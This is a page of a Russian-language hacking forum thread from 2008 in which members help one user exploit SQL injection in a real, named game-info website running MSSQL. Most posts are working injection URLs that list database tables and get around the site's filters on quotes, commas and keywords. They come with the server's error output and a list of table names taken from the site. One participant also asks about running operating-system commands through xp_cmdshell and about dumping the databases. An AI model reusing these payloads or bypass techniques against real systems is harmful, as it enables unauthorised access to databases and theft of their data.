mssql inj help

Discussion in 'Песочница' started by -=megahertz=-, 22 Mar 2008.

Page 2 of 4
  1. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    если не правильно не пинайте))
     
    #21 -=megahertz=-, 22 Mar 2008
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    о боги, боги мои, яду мне, яду!!!
    ты вот понимаешь для чего тут нужен знак неравенства <>?
    вобщем так тогда делай:
    1+or+1=(select(max(table_name))from[information_schema].tables+where+table_name+not+in+(0x7379737365676D656E7473))--
     
    #22 Scipio, 22 Mar 2008
  3. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    message: Line 5: Incorrect syntax near '56E7473'. (severity 15)
    Warning: mssql_query() [function.mssql-query]: message: The floating point value '56E7473' is out of the range of computer representation (8 bytes). (severity 15)
    Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '56E7473'. (severity 15)
     
    #23 -=megahertz=-, 22 Mar 2008
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    -=megahertz=-, ктулху?
    пробел убери в 0x7379737365676D6 56E7473
     
    #24 Scipio, 22 Mar 2008
    1 person likes this.
  5. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    вывод результата снова тот же что и в начале)
    Warning: mssql_query() [function.mssql-query]: message: Syntax error converting the nvarchar value 'syssegments' to a column of data type int. (severity 16)
    Warning: mssql_query() [function.mssql-query]: Query failed
     
    #25 -=megahertz=-, 22 Mar 2008
  6. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    А может все-таки линку в студию?:)
     
    #26 Dima-k17, 23 Mar 2008
    1 person likes this.
  7. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    можно с кем нибудь лично по асе пообщаться?
     
    #27 -=megahertz=-, 23 Mar 2008
  8. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    можно если найдешь мою асю.
     
    #28 guest3297, 23 Mar 2008
  9. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    мож через ЛС поделишся своей асей?
     
    #29 -=megahertz=-, 23 Mar 2008
  10. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    вобщем вот вам линка... долго дрючил свой мозг так и не доходит
    надеюсь на вашу помощь

    http://trot.telenet.ru/la2info/?part=npcs&id=-35332+or+1=(select(max(table_name))from[information_schema].tables+where+table_name+not+in+(0x7379737365676D656E7473))--
     
    #30 -=megahertz=-, 7 May 2008
  11. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    HTML:
    http://trot.telenet.ru/la2info/?part=npcs&id=-35332+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+1+table_name+from+information_schema.tables))--
    во втором подзапросе перебираем TOP 1,2,3 ...

    вот таблички которые я вытащил:
     
    #31 aka PSIH, 7 May 2008
    1 person likes this.
  12. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Там просто стоят фильтры... Которые вырезают кавычки, запятые, знаки сравнения, слово SELECT в верхнем регистре... Ну в общем фильтры они и есть фильтры, правда в нашем случае они вполне обходимые:

    Code:
    http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=@@version--
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables)--
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name!="henna")--
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name!="henna"+and+table_name!="castle_names")--
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name!="henna"+and+table_name!="castle_names"+and+table_name!="classes")--
    Обрати внимание, что перечисление таблиц делается не через привычный NOT IN, так как запятая вырезается, а через сцепление условий имя_поля!='значение1' and имя_поля!='значение2' and ...

    Вот имена таблиц которые удалось вытащить (это не все):

    Code:
    henna
castle_names
classes
drops
dtproperties
exp
fish_items
fish_params
item_names
items
locations
    В общем дерзай... Просто обход делай не через множество, а через сцепление условий, пускай это будет долго, но зато в обход фильтрации... В принципе можно отсеивать записи пачками используя для каждой ветки and условие NOT LIKE "...". Обрати внимание, что одинарные кавычки тоже вырезаются...
     
    #32 groundhog, 7 May 2008
    2 people like this.
  13. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    гдето уже видел такой пример но ищо раз повторю
    имена таблиц можно перебирать подзапросом
    меняя значение 2го топа: top 1, top 2 итд
    Code:
    http://trot.telenet.ru/la2info/?part=npcs&id=-35332'+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+2+table_name+from+information_schema.tables))--

    вот мы и обошлись без кавычек
     
    #33 geezer.code, 9 May 2008
    1 person likes this.
  14. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    ААФигеть вы умные %)
    -=megahertz=-, ну и как ВСЁ удалось ?
    1)Я так понимаю, что в этой базе нет таблицы accounts....
    2)Выводить сразу большой список не выйдет?
    3)А возможно сделать запрос к другой базе на этом же серве(например master)?
    Ну киньте плиз пример запроса для чтения полей и их значений в этих таблицах???
    4)возможно ли как-то выполнить такой запрос
    ?part=npcs&id=-35332+OR+1=(exec+master..xp_cmdshell+”ipconfig”)
    Что я не так делаю?
    5)Может есть хотя бы ссылка где это обсуждалось подробно?
    6)Можно ли вообще узнать список всех баз на этом сервере как-нибудь(master...northwind и т.д.)?

    ...плиз...
     
    #34 NamahS, 27 Jun 2008
    Last edited: 27 Jun 2008
  15. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Мэни-мени сенкс...извини за ПМ.
     
    #35 NamahS, 28 Jun 2008
  16. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    все отлично удалось! после этого админу рассказал все) если он не дурак то поправил)
     
    #36 -=megahertz=-, 3 Jul 2008
  17. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    А я не расскажу;))
    Нашел ссылки на снятие дампа, но ни одна не работает...Есть рабочая???
    И вопрос про exec не раскрыт...)
    ...через ; надо делать?...не получается что-то...
     
    #37 NamahS, 5 Jul 2008
    Last edited: 5 Jul 2008
  18. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    всмысле сссылки про снятие дампа? ты нашел раскрученные инъкции но слить инфу не можешь или что?
     
    #38 gisTy, 5 Jul 2008
  19. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Меня интересует Реализация скрипта для просмотра и дампинга баз, через mssql-inj
     
    #39 NamahS, 5 Jul 2008
  20. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    #40 aka PSIH, 7 Jul 2008
(You must log in or sign up to post here.)
Page 2 of 4
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.